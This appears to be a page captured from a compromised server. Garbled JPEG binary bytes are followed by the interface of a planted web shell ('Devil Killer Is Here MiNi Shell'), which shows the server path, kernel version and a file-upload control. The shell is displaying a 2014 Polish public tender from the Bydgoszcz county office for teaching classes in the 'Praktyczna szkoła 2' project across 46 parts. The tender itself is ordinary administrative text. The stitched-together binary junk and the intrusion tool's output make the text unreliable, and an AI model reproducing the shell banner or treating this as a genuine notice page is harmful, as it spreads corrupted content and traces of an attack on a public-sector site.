JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140214/53548-N-2014.html

<p class="kh_header"><b>Bydgoszcz: PROWADZENIE ZAJĘĆ W PROJEKCIE PRAKTYCZNA SZKOŁA 2</b><br>
<b>Numer ogłoszenia: 53548 - 2014; data zamieszczenia: 14.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Bydgoszczy , ul. Konarskiego 1-3/428, 85-066 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5835422, faks 052 5835452.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.bydgoski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PROWADZENIE ZAJĘĆ W PROJEKCIE PRAKTYCZNA SZKOŁA 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Przedmiotem zamówienia jest świadczenie usług polegających na prowadzeniu zajęć w projekcie nr POKL.09.02.00-04-017 13 Praktyczna szkoła 2, współfinansowanym ze środków Unii Europejskich w ramach Europejskiego Funduszu Społecznego. Projekt jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego; w następujących szkołach (dotyczy szkół kształcenia zawodowego):<br>
Zespół Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina, Karolewo, 86-022 Dobrcz<br>
Zespole Szkół Zawodowych im. Gen. S Maczka w Koronowie, ul. Dworcowa 53, 
    86-010 Koronowo<br>
Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim, ul. 23 Stycznia 13, 86-050 Solec Kujawski<br>
Zespole Szkół w Koronowie, ul. Sobieskiego 16, 86-010 Koronowo.<br>
 
2. Zamówienie podzielone jest na następujące CZĘŚCI:<br>
Część 1 - prowadzenie zajęć z doradztwa zawodowego w zakresie zakładania 
i prowadzenia własnej działalności gospodarczej (w wymiarze 1 godziny na ucznia) w Zespole Szkół Agro-Ekonomicznych w Karolewie - 15 godzin,<br>
Część 2 - prowadzenie zajęć z doradztwa edukacyjno-zawodowego - wybór dalszych kierunków kształcenia, ze szczególnym uwzględnieniem nauk ścisłych i technicznych (w wymiarze 1 godziny na ucznia) w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina 
- 15 godzin,<br>
Część 3 - prowadzenie zajęć z zakresu umiejętności interpersonalnych w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 15 godzin, <br>
Część 4 - prowadzenie zajęć dydaktyczno-wyrównawczych przygotowujących do egzaminu w zawodzie technik rolnik w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 44 godziny, <br>
Część 5 - prowadzenie zajęć dydaktyczno-wyrównawczych przygotowujących do egzaminu w zawodzie technik architektury krajobrazu w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 44 godziny,<br>
Część 6 - prowadzenie zajęć dydaktyczno-wyrównawczych przygotowujących do egzaminu w zawodzie technik żywienia i usług gastronomicznych w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 44 godziny, <br>
Część 7 - prowadzenie zajęć dydaktyczno-wyrównawczych przygotowujących do egzaminu w zawodzie kucharz w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 44 godziny, <br>
Część 8 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów, uczennic przygotowujących się do matury z matematyki w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 86 godzin, <br>
Część 9 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów, uczennic przygotowujących się do matury z języka angielskiego w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 88 godzin,<br> 
Część 10 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów, uczennic przygotowujących się do matury z języka polskiego w Zespole Szkół 
Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 86 godzin,
Część 11 -  prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów, uczennic przygotowujących się do matury z biologii w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 104 godziny,<br>
Część 12 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych - koło matematyczne w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 44 godziny, <br>
Część 13 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych - ICT w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 44 godziny, <br>
Część 14 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych - język angielski w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 148 godzin, <br>
Część 15 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych - koło teatralno-dziennikarskie w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 44 godziny,<br>
Część 16 - prowadzenie zajęć z psychologiem prowadzącym indywidualne zajęcia z uczniami, uczennicami w Zespole Szkół Agro-Ekonomicznych w Karolewie im. Bronisława  Zamojdzina - 88 godzin,<br>
Część 17 - prowadzenie zajęć z doradztwa zawodowego w zakresie zakładania 
i prowadzenia własnej działalności gospodarczej (w wymiarze 6 godzin na ucznia) w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 72 godziny, <br>
Część 18 - prowadzenie zajęć z doradztwa edukacyjno-zawodowego - wybór dalszych kierunków kształcenia, ze szczególnym uwzględnieniem nauk ścisłych i technicznych (w wymiarze 3 godziny na ucznia) w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 36 godzin,<br>
Część 19 - prowadzenie zajęć specjalistycznych z podstaw konstrukcji maszyn w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny, <br>
Część 20 - prowadzenie zajęć specjalistycznych z podstaw konstrukcji maszyn w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br> 
Część 21 - prowadzenie zajęć specjalistycznych z obróbki skrawania w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny, <br>
Część 22 - prowadzenie zajęć specjalistycznych z obróbki skrawania w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br>
Część 23 - prowadzenie zajęć specjalistycznych ze spawalnictwa w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br>
Część 24 - prowadzenie zajęć specjalistycznych - naprawa,  konserwacja oraz diagnostyka nadwozi i podwozi samochodowych w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br>
Część 25 - prowadzenie zajęć z zakresu umiejętności interpersonalnych w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br>
Część 26 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów przygotowujących się do matury z matematyki w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br>
Część 27 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów przygotowujących się do matury z matematyki w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br>
Cześć 28 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych - matematyczno-fizycznych w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br>
Część 29 - prowadzenie zajęć dodatkowych dla uczniów przygotowujących się 
do egzaminu zawodowego z informatyki w Zespole Szkół Zawodowych im. gen. 
S. Maczka w Koronowie - 104 godziny,<br>
Część 30 - prowadzenie zajęć dodatkowych dla uczniów przygotowujących się 
do egzaminu zawodowego z informatyki w Zespole Szkół Zawodowych im. gen. 
S. Maczka w Koronowie - 104 godziny,<br>
Część 31 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów przygotowujących się do matury z języka niemieckiego w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 104 godziny,<br>
Część 32 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów przygotowujących się do matury z języka polskiego w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 104 godziny,<br>
Część 33 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów przygotowujących się do matury z języka polskiego w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny, <br>
Część 34 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów przygotowujących się do matury z języka polskiego w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny, <br>
Część 35 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych- język angielski w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 104 godziny,<br>
Część 36 - prowadzenie zajęć pozalekcyjnych przygotowujących do egzaminu zawodowego technika ekonomista w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 52 godziny,<br>
Część 37 - prowadzenie zajęć z pedagogiem w Zespole Szkół Zawodowych im. gen. S. Maczka w Koronowie - 88 godzin,<br>
Część 38 - prowadzenie zajęć z doradztwa edukacyjno-zawodowego - wybór dalszych kierunków kształcenia, ze szczególnym uwzględnieniem nauk ścisłych i technicznych (w wymiarze 2 godziny na ucznia) w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 48 godzin,<br>
Część 39 - prowadzenie zajęć dydaktyczno-wyrównawczych przygotowujących 
do egzaminu w zawodzie technik mechatronik w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 72 godziny,<br>
Część 40 - prowadzenie zajęć dydaktyczno-wyrównawczych przygotowujących 
do egzaminu w zawodzie technik ekonomista w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 44 godziny,<br>
Część 41 - prowadzenie zajęć dydaktyczno-wyrównawczych dla uczniów przygotowujących się do matury z matematyki w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 88 godzin,<br>
Część 42 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych - zajęcia z fizyki w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 44 godziny,<br>
Część 43 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych - informatyka (programowanie) w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 60 godzin,<br>
Część 44 - prowadzenie zajęć ukierunkowanych na rozwój kompetencji kluczowych - język angielski w zakresie słownictwa technicznego w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 44 godziny,<br>
Część 45 - prowadzenie zajęć - koło mechanika w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 44 godziny, <br>
Część 46 - prowadzenie zajęć psychologiczno-terapeutycznych w Zespole Szkół Ogólnokształcących i Zawodowych w Solcu Kujawskim - 44 godziny.<br>

3. Szczegółowy opis przedmiotu zamówienia, w skład którego wchodzą: zakres obowiązków prowadzącego zajęcia, oświadczenie dot. przestrzegania zapisów Wytycznych w zakresie kwalifikowania wydatków w ramach POKL oraz wykaz godzin i dokumentów dla poszczególnych CZĘŚCI, stanowi Załącznik nr 1 do SIWZ.<br>
4. Wykonawca >osoba prowadząca zajęcia zobowiązany< a jest wypełniać swoje obowiązki wynikające z umowy zgodnie z postanowieniami: prawa oświatowego, statutu danej szkoły, rytmem pracy szkoły i terminami wyznaczanymi przez koordynatora szkolnego i koordynatora projektu, asystenta koordynatora projektu oraz zasadami współżycia społecznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 46.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana, 
na podstawie oświadczenia dołączonego przez Wykonawcę do Oferty - załącznik nr 2 do Oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert. <br>
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana, na podstawie oświadczenia dołączonego przez Wykonawcę do Oferty - załącznik nr 2 do Oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.<br>
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana, na podstawie oświadczenia dołączonego przez Wykonawcę do Oferty - załącznik nr 2 do Oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia - co najmniej 1 osobą, która spełnia wymagania, o których mowa w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli 
oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (tekst jednolity Dz. U. z 2013, poz. 1207). Wymagania dotyczące kwalifikacji osoby muszą być bezpośrednio powiązane z funkcją, jaką ta osoba ma pełnić w zamówieniu, tj. potwierdzać posiadanie przez nią uprawnień koniecznych do prowadzenia zajęć określonych w przedmiocie zamówienia dla danej CZĘŚCI.<br>
Wykonawca składający ofertę na więcej niż jedną CZĘŚĆ, stanowiącą przedmiot niniejszego zamówienia, wykaże się osobami spełniającymi w/w warunek udziału w postępowaniu, oddzielnie dla każdej CZĘŚCI.<br>
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana na podstawie oświadczeń i dokumentów dołączonych przez Wykonawcę do oferty - wg wzoru załącznik nr 5 i 6 do Oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.<br>
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana, na podstawie oświadczenia dołączonego przez Wykonawcę do Oferty - załącznik nr 2 do Oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz cenowy, zobowiązanie innych podmiotów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień umowy może być dokonana, w przypadku zmian nieistotnych w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. <br>
1) Zmiana postanowień umowy może być dokonana w sytuacji zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:<br>
a)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;<br>
b)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności Instytucją Zarządzającą lub Pośredniczącą, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia;<br>
c)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Pośredniczącej lub Zarządzającej;<br>
d)	gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji projektu;<br>
e)	w przypadku zmiany osoby wskazanej w załączniku >Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia<, dodanie kolejnych osób do realizacji zamówienia przez Wykonawcę, na osoby posiadające kwalifikacje nie mniejsze niż określone w warunkach udziału w postępowaniu jedynie w formie pisemnej w przypadkach wystąpienia sytuacji losowych udokumentowanych przez Wykonawcę tylko i wyłącznie za pisemną zgodą Zamawiającego.<br>
2) Zmiana terminu realizacji przedmiotu zamówienia może być dokonana, w przypadku:<br>
a)	zmiany terminów określonych w załączniku nr 1 do SIWZ, tj. przeniesienia zakładanej liczby godzin zajęć pomiędzy rokiem 2014 a 2015;<br>
b)	zmiany terminów realizacji zamówienia zgodnie ze zmianami w umowie    o dofinansowanie, w szczególności w przypadku zmiany harmonogramu realizacji projektu;<br>
c)	gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego;<br>
d)	działania siły wyższej, uniemożliwiającego wykonanie zamówienia w określonym pierwotnie terminie;<br>
e)	wystąpienia obiektywnych czynników niezależnych od Zamawiającego 
i Wykonawcy.<br>
2. Powyższe zmiany stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia zgody.
3. Zmiana postanowień Umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w postaci kolejnych aneksów, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.bydgoski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bydgoszczy, Wydział Rozwoju i Funduszy Europejskich, ul. Konarskiego 1-3, 85-066 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2014 godzina 08:30, miejsce: Starostwo Powiatowe w Bydgoszczy, ul. Konarskiego 1-3, 85-066 Bydgoszcz, KANCELARIA OGÓLNA IVp, p. 448.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




